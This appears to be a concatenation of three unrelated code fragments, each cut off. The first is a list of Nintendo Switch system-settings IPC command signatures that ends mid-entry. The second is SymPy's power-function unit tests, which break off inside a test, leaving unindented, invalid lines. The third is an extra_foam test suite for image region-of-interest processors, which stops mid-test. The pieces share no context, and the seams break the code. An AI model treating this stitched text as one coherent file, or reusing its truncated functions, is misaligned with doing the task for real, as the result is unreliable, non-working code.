('nn::settings::ISystemSettingsServer', 60, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 61, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 62, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 63, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 64, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 65, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 66, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 67, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::ISystemSettingsServer', 68, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::ISystemSettingsServer', 69, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 70, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 71, '0 bytes in - 0xC bytes out - OutRaw<0xC,4,0>'),
('nn::settings::ISystemSettingsServer', 72, '0xC bytes in - 0 bytes out - InRaw<0xC,4,0>'),
('nn::settings::ISystemSettingsServer', 73, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 74, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 75, '0 bytes in - 0x20 bytes out - OutRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 76, '0x20 bytes in - 0 bytes out - InRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 77, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x80>'),
('nn::settings::ISystemSettingsServer', 78, '0 bytes in - 0 bytes out - Buffer<0,0x15,0x80>'),
('nn::settings::ISystemSettingsServer', 79, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 80, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 81, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 82, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::settings::ISystemSettingsServer', 83, '0 bytes in - 0x10 bytes out - OutRaw<0x10,8,0>'),
('nn::settings::ISystemSettingsServer', 84, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::ISystemSettingsServer', 85, '0x18 bytes in - 0 bytes out - InRaw<0x18,1,0>'),
('nn::settings::ISystemSettingsServer', 86, '0 bytes in - 0x18 bytes out - OutRaw<0x18,4,0>'),
('nn::settings::ISystemSettingsServer', 87, '0x18 bytes in | |
<filename>sympy/core/tests/test_power.py
from sympy.core import (
Basic, Rational, Symbol, S, Float, Integer, Mul, Number, Pow,
Expr, I, nan, pi, symbols, oo, zoo, N)
from sympy.core.tests.test_evalf import NS
from sympy.core.function import expand_multinomial
from sympy.functions.elementary.miscellaneous import sqrt, cbrt
from sympy.functions.elementary.exponential import exp, log
from sympy.functions.special.error_functions import erf
from sympy.functions.elementary.trigonometric import (
sin, cos, tan, sec, csc, sinh, cosh, tanh, atan)
from sympy.polys import Poly
from sympy.series.order import O
from sympy.sets import FiniteSet
from sympy.core.expr import unchanged
from sympy.testing.pytest import warns_deprecated_sympy
def test_rational():
    """Powers of a Rational reduce to the expected radical forms."""
    a = Rational(1, 5)
    # sqrt(1/5) simplifies to sqrt(5)/5
    expected = sqrt(5)/5
    assert sqrt(a) == expected
    assert 2*sqrt(a) == 2*expected
    # a**(3/2) splits as a * a**(1/2)
    expected = a*a**S.Half
    assert a**Rational(3, 2) == expected
    assert 2*a**Rational(3, 2) == 2*expected
    # a**(17/3) splits as a**5 * a**(2/3)
    expected = a**5*a**Rational(2, 3)
    assert a**Rational(17, 3) == expected
    assert 2 * a**Rational(17, 3) == 2*expected
def test_large_rational():
    """The cube root of a huge exact rational stays exact."""
    base = Rational(123712**12 - 1, 7) + Rational(1, 7)
    assert base**Rational(1, 3) == 234232585392159195136 * (Rational(1, 7)**Rational(1, 3))
def test_negative_real():
    """Dividing by a negative Float gives the expected Integer value."""
    def close_enough(a, b):
        # float comparison within an absolute tolerance
        return abs(a - b) < 1E-10
    assert close_enough(S.One / Float(-0.5), -Integer(2))
def test_expand():
    """2**(-1 - x) expands to (1/2) * 2**(-x)."""
    x = Symbol('x')
    expanded = (2**(-1 - x)).expand()
    assert expanded == S.Half*2**(-x)
def test_issue_3449():
    """Power-of-power simplification (x**a)**b -> x**(a*b) must only fire
    when it is valid; see also issue 3995.

    The rule is safe for integer exponents and for positive bases, but not
    in general for real/complex bases — several assertions below pin the
    cases where simplification must NOT happen.
    """
    #test if powers are simplified correctly
    #see also issue 3995
    x = Symbol('x')
    assert ((x**Rational(1, 3))**Rational(2)) == x**Rational(2, 3)
    assert (
        (x**Rational(3))**Rational(2, 5)) == (x**Rational(3))**Rational(2, 5)

    a = Symbol('a', real=True)
    b = Symbol('b', real=True)
    # for real a, (a**2)**b collapses through |a|, not through a itself
    assert (a**2)**b == (abs(a)**b)**2
    assert sqrt(1/a) != 1/sqrt(a)  # e.g. for a = -1
    assert (a**3)**Rational(1, 3) != a
    assert (x**a)**b != x**(a*b)  # e.g. x = -1, a=2, b=1/2
    assert (x**.5)**b == x**(.5*b)
    assert (x**.5)**.5 == x**.25
    assert (x**2.5)**.5 != x**1.25  # e.g. for x = 5*I

    # integer exponents always combine
    k = Symbol('k', integer=True)
    m = Symbol('m', integer=True)
    assert (x**k)**m == x**(k*m)
    assert Number(5)**Rational(2, 3) == Number(25)**Rational(1, 3)

    assert (x**.5)**2 == x**1.0
    assert (x**2)**k == (x**k)**2 == x**(2*k)

    # positive bases always combine
    a = Symbol('a', positive=True)
    assert (a**3)**Rational(2, 5) == a**Rational(6, 5)
    assert (a**2)**b == (a**b)**2
    assert (a**Rational(2, 3))**x == a**(x*Rational(2, 3)) != (a**x)**Rational(2, 3)
def test_issue_3866():
    """A double unary minus cancels on an unevaluated sqrt expression."""
    e = sqrt(sqrt(5) - 1)
    assert --e == e
def test_negative_one():
    """1/x**y rewrites to x**(-y) for complex symbols."""
    base = Symbol('x', complex=True)
    expo = Symbol('y', complex=True)
    assert 1/base**expo == base**(-expo)
def test_issue_4362():
    """as_numer_denom() must respect the sign of bases under fractional powers.

    Splitting (num/den)**pow into numerator and denominator is only valid
    when negative factors are negated consistently; otherwise branch cuts
    of the fractional power are crossed.
    """
    neg = Symbol('neg', negative=True)
    nonneg = Symbol('nonneg', nonnegative=True)
    any = Symbol('any')
    # negative denominator: the I factor must be extracted
    num, den = sqrt(1/neg).as_numer_denom()
    assert num == sqrt(-1)
    assert den == sqrt(-neg)
    num, den = sqrt(1/nonneg).as_numer_denom()
    assert num == 1
    assert den == sqrt(nonneg)
    # unknown sign: no split is performed
    num, den = sqrt(1/any).as_numer_denom()
    assert num == sqrt(1/any)
    assert den == 1

    def eqn(num, den, pow):
        # helper building (num/den)**pow
        return (num/den)**pow
    # fixed-sign numerators/denominators used below
    npos = 1
    nneg = -1
    dpos = 2 - sqrt(3)
    dneg = 1 - sqrt(3)
    assert dpos > 0 and dneg < 0 and npos > 0 and nneg < 0
    # pos or neg integer
    eq = eqn(npos, dpos, 2)
    assert eq.is_Pow and eq.as_numer_denom() == (1, dpos**2)
    eq = eqn(npos, dneg, 2)
    assert eq.is_Pow and eq.as_numer_denom() == (1, dneg**2)
    eq = eqn(nneg, dpos, 2)
    assert eq.is_Pow and eq.as_numer_denom() == (1, dpos**2)
    eq = eqn(nneg, dneg, 2)
    assert eq.is_Pow and eq.as_numer_denom() == (1, dneg**2)
    eq = eqn(npos, dpos, -2)
    assert eq.is_Pow and eq.as_numer_denom() == (dpos**2, 1)
    eq = eqn(npos, dneg, -2)
    assert eq.is_Pow and eq.as_numer_denom() == (dneg**2, 1)
    eq = eqn(nneg, dpos, -2)
    assert eq.is_Pow and eq.as_numer_denom() == (dpos**2, 1)
    eq = eqn(nneg, dneg, -2)
    assert eq.is_Pow and eq.as_numer_denom() == (dneg**2, 1)
    # pos or neg rational
    pow = S.Half
    eq = eqn(npos, dpos, pow)
    assert eq.is_Pow and eq.as_numer_denom() == (npos**pow, dpos**pow)
    eq = eqn(npos, dneg, pow)
    assert eq.is_Pow is False and eq.as_numer_denom() == ((-npos)**pow, (-dneg)**pow)
    eq = eqn(nneg, dpos, pow)
    assert not eq.is_Pow or eq.as_numer_denom() == (nneg**pow, dpos**pow)
    eq = eqn(nneg, dneg, pow)
    assert eq.is_Pow and eq.as_numer_denom() == ((-nneg)**pow, (-dneg)**pow)
    eq = eqn(npos, dpos, -pow)
    assert eq.is_Pow and eq.as_numer_denom() == (dpos**pow, npos**pow)
    eq = eqn(npos, dneg, -pow)
    assert eq.is_Pow is False and eq.as_numer_denom() == (-(-npos)**pow*(-dneg)**pow, npos)
    eq = eqn(nneg, dpos, -pow)
    assert not eq.is_Pow or eq.as_numer_denom() == (dpos**pow, nneg**pow)
    eq = eqn(nneg, dneg, -pow)
    assert eq.is_Pow and eq.as_numer_denom() == ((-dneg)**pow, (-nneg)**pow)
    # unknown exponent
    pow = 2*any
    eq = eqn(npos, dpos, pow)
    assert eq.is_Pow and eq.as_numer_denom() == (npos**pow, dpos**pow)
    eq = eqn(npos, dneg, pow)
    assert eq.is_Pow and eq.as_numer_denom() == ((-npos)**pow, (-dneg)**pow)
    eq = eqn(nneg, dpos, pow)
    assert eq.is_Pow and eq.as_numer_denom() == (nneg**pow, dpos**pow)
    eq = eqn(nneg, dneg, pow)
    assert eq.is_Pow and eq.as_numer_denom() == ((-nneg)**pow, (-dneg)**pow)
    eq = eqn(npos, dpos, -pow)
    assert eq.as_numer_denom() == (dpos**pow, npos**pow)
    eq = eqn(npos, dneg, -pow)
    assert eq.is_Pow and eq.as_numer_denom() == ((-dneg)**pow, (-npos)**pow)
    eq = eqn(nneg, dpos, -pow)
    assert eq.is_Pow and eq.as_numer_denom() == (dpos**pow, nneg**pow)
    eq = eqn(nneg, dneg, -pow)
    assert eq.is_Pow and eq.as_numer_denom() == ((-dneg)**pow, (-nneg)**pow)

    x = Symbol('x')
    y = Symbol('y')
    assert ((1/(1 + x/3))**(-S.One)).as_numer_denom() == (3 + x, 3)
    notp = Symbol('notp', positive=False)  # not positive does not imply real
    b = ((1 + x/notp)**-2)
    assert (b**(-y)).as_numer_denom() == (1, b**y)
    assert (b**(-S.One)).as_numer_denom() == ((notp + x)**2, notp**2)
    nonp = Symbol('nonp', nonpositive=True)
    assert (((1 + x/nonp)**-2)**(-S.One)).as_numer_denom() == ((-nonp -
            x)**2, nonp**2)
    n = Symbol('n', negative=True)
    assert (x**n).as_numer_denom() == (1, x**-n)
    assert sqrt(1/n).as_numer_denom() == (S.ImaginaryUnit, sqrt(-n))
    n = Symbol('0 or neg', nonpositive=True)
    # if x and n are split up without negating each term and n is negative
    # then the answer might be wrong; if n is 0 it won't matter since
    # 1/oo and 1/zoo are both zero as is sqrt(0)/sqrt(-x) unless x is also
    # zero (in which case the negative sign doesn't matter):
    # 1/sqrt(1/-1) = -I but sqrt(-1)/sqrt(1) = I
    assert (1/sqrt(x/n)).as_numer_denom() == (sqrt(-n), sqrt(-x))
    c = Symbol('c', complex=True)
    e = sqrt(1/c)
    assert e.as_numer_denom() == (e, 1)
    i = Symbol('i', integer=True)
    assert ((1 + x/y)**i).as_numer_denom() == ((x + y)**i, y**i)
def test_Pow_Expr_args():
    """Using a non-Expr object as a Pow base is deprecated and must warn."""
    x = Symbol('x')
    for non_expr_base in (Basic(), Poly(x, x), FiniteSet(x)):
        with warns_deprecated_sympy():
            Pow(non_expr_base, S.One)
def test_Pow_signs():
    """Cf. issues 4595 and 5250: (a - b)**n must not collapse to (b - a)**n."""
    u = Symbol('x')
    v = Symbol('y')
    even = Symbol('n', even=True)
    assert (3 - v)**2 != (v - 3)**2
    assert (3 - v)**even != (v - 3)**even
    assert (-3 + v - u)**2 != (3 - v + u)**2
    assert (v - 3)**3 != -(3 - v)**3
def test_power_with_noncommutative_mul_as_base():
    """A power of a noncommutative product must not distribute over it."""
    p = Symbol('x', commutative=False)
    q = Symbol('y', commutative=False)
    # distribution over noncommutative factors would reorder them
    assert (p*q)**3 != p**3*q**3
    # commutative scalar factors may still be pulled out
    assert (2*p*q)**3 == 8*(p*q)**3
def test_power_rewrite_exp():
    """Pow.rewrite(exp) must produce exp(exponent*log(base)) on the right branch."""
    assert (I**I).rewrite(exp) == exp(-pi/2)
    # complex base, complex exponent
    expr = (2 + 3*I)**(4 + 5*I)
    assert expr.rewrite(exp) == exp((4 + 5*I)*(log(sqrt(13)) + I*atan(Rational(3, 2))))
    assert expr.rewrite(exp).expand() == \
        169*exp(5*I*log(13)/2)*exp(4*I*atan(Rational(3, 2)))*exp(-5*atan(Rational(3, 2)))
    assert ((6 + 7*I)**5).rewrite(exp) == 7225*sqrt(85)*exp(5*I*atan(Rational(7, 6)))
    # positive integer base, complex exponent
    expr = 5**(6 + 7*I)
    assert expr.rewrite(exp) == exp((6 + 7*I)*log(5))
    assert expr.rewrite(exp).expand() == 15625*exp(7*I*log(5))
    # fully numeric powers stay unchanged
    assert Pow(123, 789, evaluate=False).rewrite(exp) == 123**789
    assert (1**I).rewrite(exp) == 1**I
    assert (0**I).rewrite(exp) == 0**I
    # negative base: the principal branch log(2) + I*pi is used
    expr = (-2)**(2 + 5*I)
    assert expr.rewrite(exp) == exp((2 + 5*I)*(log(2) + I*pi))
    assert expr.rewrite(exp).expand() == 4*exp(-5*pi)*exp(5*I*log(2))
    assert ((-2)**S(-5)).rewrite(exp) == (-2)**S(-5)
    # symbolic bases and exponents
    x, y = symbols('x y')
    assert (x**y).rewrite(exp) == exp(y*log(x))
    assert (7**x).rewrite(exp) == exp(x*log(7), evaluate=False)
    assert ((2 + 3*I)**x).rewrite(exp) == exp(x*(log(sqrt(13)) + I*atan(Rational(3, 2))))
    assert (y**(5 + 6*I)).rewrite(exp) == exp(log(y)*(5 + 6*I))
    # reciprocal of a trig/hyperbolic function rewrites through the function
    assert all((1/func(x)).rewrite(exp) == 1/(func(x).rewrite(exp)) for func in
               (sin, cos, tan, sec, csc, sinh, cosh, tanh))
def test_zero():
    """Powers of zero with symbolic exponents keep their sign/branch data."""
    u = Symbol('x')
    v = Symbol('y')
    assert 0**u != 0
    assert 0**(2*u) == 0**u
    assert 0**(1.0*u) == 0**u
    assert 0**(2.0*u) == 0**u
    assert (0**(2 - u)).as_base_exp() == (0, 2 - u)
    assert 0**(u - 2) != S.Infinity**(2 - u)
    assert 0**(2*u*v) == 0**(u*v)
    assert 0**(-2*u*v) == S.ComplexInfinity**(u*v)
def test_pow_as_base_exp():
    """as_base_exp() canonicalizes bases (oo kept, 1/2 becomes 2**-x)."""
    x = Symbol('x')
    assert (S.Infinity**(2 - x)).as_base_exp() == (S.Infinity, 2 - x)
    assert (S.Infinity**(x - 2)).as_base_exp() == (S.Infinity, x - 2)
    p = S.Half**x
    # BUG FIX: the original line read
    #     assert p.base, p.exp == p.as_base_exp() == (S(2), -x)
    # which Python parses as ``assert p.base`` with the whole comparison
    # used as the (never evaluated) failure message, so the intended
    # check was silently skipped.  Assert the canonicalization directly.
    assert p.as_base_exp() == (S(2), -x)
    # issue 8344:
    assert Pow(1, 2, evaluate=False).as_base_exp() == (S.One, S(2))
def test_nseries():
    """_eval_nseries must respect the direction argument on branch cuts."""
    x = Symbol('x')
    # sqrt(I*x - 1) expanded from above (+1) and below (-1) the cut
    assert sqrt(I*x - 1)._eval_nseries(x, 4, None, 1) == I + x/2 + I*x**2/8 - x**3/16 + O(x**4)
    assert sqrt(I*x - 1)._eval_nseries(x, 4, None, -1) == -I - x/2 - I*x**2/8 + x**3/16 + O(x**4)
    # cbrt picks up a branch factor exp(-2*I*pi/3) below the cut
    assert cbrt(I*x - 1)._eval_nseries(x, 4, None, 1) == (-1)**(S(1)/3) - (-1)**(S(5)/6)*x/3 + \
        (-1)**(S(1)/3)*x**2/9 + 5*(-1)**(S(5)/6)*x**3/81 + O(x**4)
    assert cbrt(I*x - 1)._eval_nseries(x, 4, None, -1) == (-1)**(S(1)/3)*exp(-2*I*pi/3) - \
        (-1)**(S(5)/6)*x*exp(-2*I*pi/3)/3 + (-1)**(S(1)/3)*x**2*exp(-2*I*pi/3)/9 + \
        5*(-1)**(S(5)/6)*x**3*exp(-2*I*pi/3)/81 + O(x**4)
    # exponentially small terms survive the expansion
    assert (1 / (exp(-1/x) + 1/x))._eval_nseries(x, 2, None) == -x**2*exp(-1/x) + x
def test_issue_6100_12942_4473():
x = Symbol('x')
y = Symbol('y')
| |
# File: extra_foam/pipeline/processors/tests/test_image_roi.py
"""
Distributed under the terms of the BSD 3-Clause License.
The full license is in the file LICENSE, distributed with this software.
Author: <NAME> <<EMAIL>>
Copyright (C) European X-Ray Free-Electron Laser Facility GmbH.
All rights reserved.
"""
import random
import warnings
from unittest.mock import MagicMock, patch, PropertyMock

import numpy as np
import pytest

from extra_foam.pipeline.exceptions import ProcessingError
from extra_foam.pipeline.processors import ImageRoiTrain, ImageRoiPulse
from extra_foam.config import AnalysisType, config, Normalizer, RoiCombo, RoiFom, RoiProjType
from extra_foam.pipeline.tests import _TestDataMixin
# here we use numpy functions to calculate the ground truth
def _normalized_nanstd(*args, **kwargs):
return np.nanstd(*args, **kwargs) / np.nanmean(*args, **kwargs)
def _normalized_nanvar(*args, **kwargs):
return np.nanvar(*args, **kwargs) / np.nanmean(*args, **kwargs) ** 2
# Ground-truth reduction for each ROI figure-of-merit (FOM) type.
# All handlers are NaN-aware numpy reductions; N_STD/N_VAR are the
# mean-normalized variants defined above.
_roi_fom_handlers = {
    RoiFom.SUM: np.nansum,
    RoiFom.MEAN: np.nanmean,
    RoiFom.MEDIAN: np.nanmedian,
    RoiFom.MAX: np.nanmax,
    RoiFom.MIN: np.nanmin,
    RoiFom.STD: np.nanstd,
    RoiFom.VAR: np.nanvar,
    RoiFom.N_STD: _normalized_nanstd,
    RoiFom.N_VAR: _normalized_nanvar
}
# Ground-truth reduction for each ROI projection type (NaN-aware).
_roi_proj_handlers = {
    RoiProjType.SUM: np.nansum,
    RoiProjType.MEAN: np.nanmean
}
class TestImageRoiPulse(_TestDataMixin):
    """Unit tests for the pulse-resolved ROI processor (ImageRoiPulse)."""

    @pytest.fixture(autouse=True)
    def setUp(self):
        # The processor must be constructed with a pulse-resolved detector
        # configuration; geometries are given as [x, y, width, height].
        with patch.dict(config._data, {"PULSE_RESOLVED": True}):
            proc = ImageRoiPulse()
        proc._geom1 = [0, 1, 2, 3]
        proc._geom2 = [1, 0, 2, 3]
        proc._geom3 = [1, 2, 2, 3]
        proc._geom4 = [3, 2, 3, 4]
        self._proc = proc

    def _get_data(self, poi_indices=None):
        """Return (data, processed) for a 4-pulse, 20x20 assembled train."""
        if poi_indices is None:
            poi_indices = [0, 0]
        return self.data_with_assembled(1001, (4, 20, 20), gen='range', poi_indices=poi_indices)

    def _get_roi_slice(self, geom):
        # get a tuple of slice object which can be used to slice ROI
        return slice(geom[1], geom[1] + geom[3]), slice(geom[0], geom[0] + geom[2])

    def testRoiGeom(self):
        """The four ROI geometries must be forwarded to the processed data."""
        proc = self._proc
        data, processed = self._get_data()
        with patch.object(proc._meta, 'has_analysis', side_effect=lambda x: True):
            proc.process(data)
        roi = processed.roi
        assert list(roi.geom1.geometry) == proc._geom1
        assert list(roi.geom2.geometry) == proc._geom2
        assert list(roi.geom3.geometry) == proc._geom3
        assert list(roi.geom4.geometry) == proc._geom4

    @pytest.mark.parametrize("norm_type, fom_handler",
                             [(k, v) for k, v in _roi_fom_handlers.items()])
    def testRoiNorm(self, norm_type, fom_handler):
        """Pulse-resolved ROI normalizer for single and combined ROI3/ROI4."""
        proc = self._proc
        with patch.object(proc._meta, 'has_analysis',
                          side_effect=lambda x: True if x == AnalysisType.ROI_NORM_PULSE else False):
            for combo, geom in zip([RoiCombo.ROI3, RoiCombo.ROI4], ['_geom3', '_geom4']):
                data, processed = self._get_data()
                proc._norm_combo = combo
                proc._norm_type = norm_type
                proc.process(data)
                s = self._get_roi_slice(getattr(proc, geom))
                fom_gt = fom_handler(data['assembled']['sliced'][:, s[0], s[1]], axis=(-2, -1))
                np.testing.assert_array_almost_equal_nulp(fom_gt, processed.pulse.roi.norm)
            for norm_combo in [RoiCombo.ROI3_SUB_ROI4, RoiCombo.ROI3_ADD_ROI4]:
                data, processed = self._get_data()
                proc._norm_combo = norm_combo
                proc._norm_type = norm_type
                proc.process(data)
                s3 = self._get_roi_slice(proc._geom3)
                fom3_gt = fom_handler(data['assembled']['sliced'][:, s3[0], s3[1]], axis=(-2, -1))
                s4 = self._get_roi_slice(proc._geom4)
                fom4_gt = fom_handler(data['assembled']['sliced'][:, s4[0], s4[1]], axis=(-2, -1))
                if norm_combo == RoiCombo.ROI3_SUB_ROI4:
                    np.testing.assert_array_almost_equal(fom3_gt - fom4_gt, processed.pulse.roi.norm, decimal=4)
                else:
                    np.testing.assert_array_almost_equal(fom3_gt + fom4_gt, processed.pulse.roi.norm, decimal=4)
        # without the matching analysis type no normalizer is produced
        with patch.object(proc._meta, 'has_analysis', side_effect=lambda x: False):
            data, processed = self._get_data()
            proc.process(data)
            assert processed.pulse.roi.norm is None

    @pytest.mark.parametrize("fom_type, fom_handler",
                             [(k, v) for k, v in _roi_fom_handlers.items()])
    def testRoiFom(self, fom_type, fom_handler):
        """Pulse-resolved ROI FOM for single and combined ROI1/ROI2."""
        proc = self._proc
        proc._fom_norm = Normalizer.UNDEFINED
        proc._fom_type = fom_type
        with patch.object(proc._meta, 'has_analysis',
                          side_effect=lambda x: True if x == AnalysisType.ROI_FOM_PULSE else False):
            for combo, geom in zip([RoiCombo.ROI1, RoiCombo.ROI2], ['_geom1', '_geom2']):
                data, processed = self._get_data()
                proc._fom_combo = combo
                proc.process(data)
                s = self._get_roi_slice(getattr(proc, geom))
                fom_gt = fom_handler(data['assembled']['sliced'][:, s[0], s[1]], axis=(-1, -2))
                np.testing.assert_array_almost_equal(fom_gt, processed.pulse.roi.fom, decimal=4)
            for combo in [RoiCombo.ROI1_SUB_ROI2, RoiCombo.ROI1_ADD_ROI2, RoiCombo.ROI1_DIV_ROI2]:
                data, processed = self._get_data()
                proc._fom_combo = combo
                proc.process(data)
                s1 = self._get_roi_slice(proc._geom1)
                fom1_gt = fom_handler(data['assembled']['sliced'][:, s1[0], s1[1]], axis=(-1, -2))
                s2 = self._get_roi_slice(proc._geom2)
                fom2_gt = fom_handler(data['assembled']['sliced'][:, s2[0], s2[1]], axis=(-1, -2))
                if combo == RoiCombo.ROI1_SUB_ROI2:
                    np.testing.assert_array_almost_equal(
                        fom1_gt - fom2_gt, processed.pulse.roi.fom, decimal=4)
                elif combo == RoiCombo.ROI1_ADD_ROI2:
                    np.testing.assert_array_almost_equal(
                        fom1_gt + fom2_gt, processed.pulse.roi.fom, decimal=4)
                else:
                    np.testing.assert_array_almost_equal(
                        fom1_gt / fom2_gt, processed.pulse.roi.fom, decimal=4)
                if combo == RoiCombo.ROI1_DIV_ROI2:
                    # BUG FIX: use the stdlib ``warnings`` module here; the
                    # ``np.warnings`` alias was deprecated in NumPy 1.24 and
                    # removed in later releases.
                    with warnings.catch_warnings():
                        warnings.simplefilter("ignore", category=RuntimeWarning)
                        # test some of ROI2 FOM are nan
                        data, processed = self._get_data()
                        data['assembled']['sliced'][:2, :, :] = np.nan
                        proc.process(data)
                        s1 = self._get_roi_slice(proc._geom1)
                        fom1_gt = fom_handler(data['assembled']['sliced'][:, s1[0], s1[1]], axis=(-1, -2))
                        s2 = self._get_roi_slice(proc._geom2)
                        fom2_gt = fom_handler(data['assembled']['sliced'][:, s2[0], s2[1]], axis=(-1, -2))
                        assert np.count_nonzero(~np.isnan(fom1_gt / fom2_gt)) > 0
                        np.testing.assert_array_almost_equal(
                            fom1_gt / fom2_gt, processed.pulse.roi.fom, decimal=4)
                        # test all of ROI2 FOM are nan
                        data, processed = self._get_data()
                        processed.image.image_mask[s2[0], s2[1]] = True
                        proc.process(data)
                        if fom_type == RoiFom.SUM:
                            assert np.count_nonzero(~np.isinf(processed.pulse.roi.fom)) == 0
                        else:
                            assert np.count_nonzero(~np.isnan(processed.pulse.roi.fom)) == 0
        # without the matching analysis type no FOM is produced
        with patch.object(proc._meta, 'has_analysis', side_effect=lambda x: False):
            data, processed = self._get_data()
            proc.process(data)
            assert processed.pulse.roi.fom is None

    def testRoiHist(self):
        """Pixel histograms use the ROI of the second POI pulse only."""
        proc = self._proc
        mocked_return = 1, 1, 1, 1, 1
        with patch.object(proc._meta, 'has_analysis', side_effect=lambda x: True):
            with patch("extra_foam.pipeline.processors.image_roi.nanhist_with_stats",
                       return_value=mocked_return) as hist_with_stats:
                for combo, geom in zip([RoiCombo.ROI1, RoiCombo.ROI2],
                                       ['_geom1', '_geom2']):
                    data, processed = self._get_data(poi_indices=[0, 2])
                    proc._hist_combo = combo
                    proc._hist_n_bins = 10
                    proc.process(data)
                    s = self._get_roi_slice(getattr(proc, geom))
                    hist_with_stats.assert_called()
                    # ROI of the second POI
                    roi_gt = data['assembled']['sliced'][2, s[0], s[1]]
                    np.testing.assert_array_equal(roi_gt, hist_with_stats.call_args[0][0])
                    hist_with_stats.reset_mock()
                    hist = processed.pulse.roi.hist
                    # only POI indices 0 and 2 carry histograms
                    with pytest.raises(KeyError):
                        hist[1]
                    with pytest.raises(KeyError):
                        hist[3]
                for fom_combo in [RoiCombo.ROI1_SUB_ROI2, RoiCombo.ROI1_ADD_ROI2]:
                    data, processed = self._get_data(poi_indices=[1, 2])
                    proc._hist_combo = fom_combo
                    proc._hist_n_bins = 20
                    proc.process(data)
                    s1 = self._get_roi_slice(proc._geom1)
                    # ROI of the second POI
                    roi1_gt = data['assembled']['sliced'][2, s1[0], s1[1]]
                    s2 = self._get_roi_slice(proc._geom2)
                    roi2_gt = data['assembled']['sliced'][2, s2[0], s2[1]]
                    hist_with_stats.assert_called()
                    if fom_combo == RoiCombo.ROI1_SUB_ROI2:
                        np.testing.assert_array_equal(roi1_gt - roi2_gt,
                                                      hist_with_stats.call_args[0][0])
                    else:
                        np.testing.assert_array_equal(roi1_gt + roi2_gt,
                                                      hist_with_stats.call_args[0][0])
                    hist_with_stats.reset_mock()
                    hist = processed.pulse.roi.hist
                    with pytest.raises(KeyError):
                        hist[0]
                    with pytest.raises(KeyError):
                        hist[3]
                # combining ROIs with mismatched shapes must log an error
                with patch('extra_foam.ipc.ProcessLogger.error') as error:
                    proc._geom2 = [1, 0, 1, 3]
                    proc.process(data)
                    error.assert_called_once()

    def testOnTrainResolvedDetector(self):
        """Pulse-resolved processing is skipped for train-resolved detectors."""
        proc = self._proc
        proc._pulse_resolved = False
        proc._process_fom = MagicMock()
        proc._process_norm = MagicMock()
        proc._process_hist = MagicMock()
        data, processed = self._get_data()
        proc.process(data)
        proc._process_fom.assert_not_called()
        proc._process_norm.assert_not_called()
        proc._process_hist.assert_not_called()
class TestImageRoiTrain(_TestDataMixin):
@pytest.fixture(autouse=True)
def setUp(self):
proc = ImageRoiTrain()
proc._set_ma_window(1)
proc._auc_range = (0, 1000)
proc._fom_integ_range = (0, 1000)
proc._meta.has_analysis = MagicMock(return_value=False)
proc._meta.has_any_analysis = MagicMock(return_value=False)
self._proc = proc
    def _get_data(self):
        """Return (data, processed) for a 20x20 train with ROI geometries set.

        A pulse processor is run first because it is responsible for
        populating processed.roi.geom{1, 2, 3, 4}.
        """
        shape = (20, 20)
        data, processed = self.data_with_assembled(1001, shape, gen='range')
        proc = ImageRoiPulse()
        proc._geom1 = [0, 1, 2, 3]
        # In order to pass the test, ROI1 and ROI2 cannot have overlap.
        proc._geom2 = [5, 6, 2, 3]
        proc._geom3 = [1, 2, 2, 3]
        proc._geom4 = [3, 2, 3, 4]
        # set processed.roi.geom{1, 2, 3, 4}
        proc._process_hist = MagicMock()  # it does not affect train-resolved analysis
        proc.process(data)
        # random pump-probe images for on/off analysis
        processed.pp.image_on = 100 * np.random.randn(*shape).astype(np.float32) + 1.
        processed.pp.image_off = 100 * np.random.randn(*shape).astype(np.float32)
        return data, processed
def _get_roi_slice(self, geom):
return slice(geom[1], geom[1] + geom[3]), slice(geom[0], geom[0] + geom[2])
    @patch('extra_foam.ipc.ProcessLogger.error')
    def testNormalizationError(self, error):
        """A ProcessingError in one stage must not abort the later stages."""
        def side_effect(*args, **kwargs):
            raise ProcessingError
        proc = self._proc
        with patch.object(proc, "_normalize_fom", side_effect=side_effect):
            # let "_process_fom" raise
            with patch.object(proc, "_process_proj") as mocked_p_proj:
                data, processed = self._get_data()
                proc.process(data)
                # the projection stage still runs after the FOM failure
                mocked_p_proj.assert_called_once()
        with patch.object(proc, "_process_fom"):
            # let "_process_proj" raise
            with patch.object(proc, "_normalize_fom", side_effect=side_effect):
                with patch.object(proc, "_process_norm_pump_probe") as mocked_p_norm_pp:
                    data, processed = self._get_data()
                    processed.pp.analysis_type = AnalysisType.ROI_PROJ
                    proc.process(data)
                    # the pump-probe stage still runs after the proj failure
                    mocked_p_norm_pp.assert_called_once()
    @pytest.mark.parametrize("norm_type, fom_handler",
                             [(k, v) for k, v in _roi_fom_handlers.items()])
    def testRoiNorm(self, norm_type, fom_handler):
        """Train-resolved ROI normalizer for single and combined ROI3/ROI4."""
        proc = self._proc
        for combo, geom in zip([RoiCombo.ROI3, RoiCombo.ROI4], ['geom3', 'geom4']):
